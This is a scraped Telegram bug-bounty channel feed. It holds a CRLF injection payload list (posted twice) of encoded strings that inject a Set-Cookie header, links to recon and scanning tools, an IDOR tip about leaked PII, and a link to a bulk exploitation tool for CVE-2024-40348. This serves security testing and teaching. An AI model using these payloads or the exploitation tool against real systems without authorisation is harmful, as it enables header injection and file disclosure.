Bug Bounty Tip
CRLF Injection Attack Payload List
🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf
#bugbounty #cybersecurity #ethicalhacking
CRLF Injection Attack Payload List
🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf
#bugbounty #cybersecurity #ethicalhacking
❤9👍5
YouTube
How To Restore Windows boot loader After Deleting Linux and Grub loader| H4K-XTRA
So I'm back on youtube :D
In This Video i will be showing how to unistall linux and remove grub bootloader.
Restore Windows boot loader After Deleting Linux and Grub loader
Because most of the time you find that even after unistalling linux the grub boot…
In This Video i will be showing how to unistall linux and remove grub bootloader.
Restore Windows boot loader After Deleting Linux and Grub loader
Because most of the time you find that even after unistalling linux the grub boot…
XSS Cheatsheet Burpsuite Extension https://portswigger.net/bappstore/eb75d39684b845adb457bcb050d1aa1d
👍3
👉 InfiSCA: Your Open-Source Vulnerability Scanner
InfiSCA is an open-source software composition analysis (SCA) tool. Think of it as a security guard for your software supply chain.
🔗Download :https://github.com/Infisical/infisical
InfiSCA is an open-source software composition analysis (SCA) tool. Think of it as a security guard for your software supply chain.
🔗Download :
👍7❤1🔥1
📮JScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.
✅Download-https://github.com/ifconfig-me/JScripter
#BugBounty #bugbountytips
✅Download-
#BugBounty #bugbountytips
🔥8👍1
🚀 Apepe - Mobile application pentesting🚀
🕵️ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...
🧾 Source - github.com/oppsec/Apepe
🕵️ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...
🧾 Source - github.com/oppsec/Apepe
❤7
Do Sign Up for Top Notch Results 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
Drop Your Suggestions for Resources
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣5😁2🙏1
This media is not supported in your browser
VIEW IN TELEGRAM
BBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.
😚 https://github.com/honoki/bbrf-client/
Please open Telegram to view this post
VIEW IN TELEGRAM
👏2👍1
IDOR in Reset Password
When the user reset his password the application make an API request to make sure that username exists. If exist, it will come back with Personal Identifying Information (PII) in the response [Full name,Email,Phone number].
By:@Maakthon
#bugbountytips
When the user reset his password the application make an API request to make sure that username exists. If exist, it will come back with Personal Identifying Information (PII) in the response [Full name,Email,Phone number].
By:@Maakthon
#bugbountytips
❤11👍4
🚨 CVE-2024-40348 🚨
👉 This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.
🔗 Download : https://github.com/bigb0x/CVE-2024-40348
👉 This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.
🔗 Download : https://github.com/bigb0x/CVE-2024-40348
🔥2❤1
Please open Telegram to view this post
VIEW IN TELEGRAM
Ko-fi
Buy Brut Security a Coffee
Become a supporter of Brut Security today!
❤2🤝1
Brut Security pinned «🤩 Hey everyone, thanks for being part of this awesome community! 🐸 If you enjoy my content and want to support me, you can buy me a coffee on Ko-fi: https://ko-fi.com/brutxninja ☕️ !»
Please open Telegram to view this post
VIEW IN TELEGRAM
Ko-fi
A Practical Guide to Starting Your Cybersecurity Career in India
Brut Security published a post on Ko-fi
❤1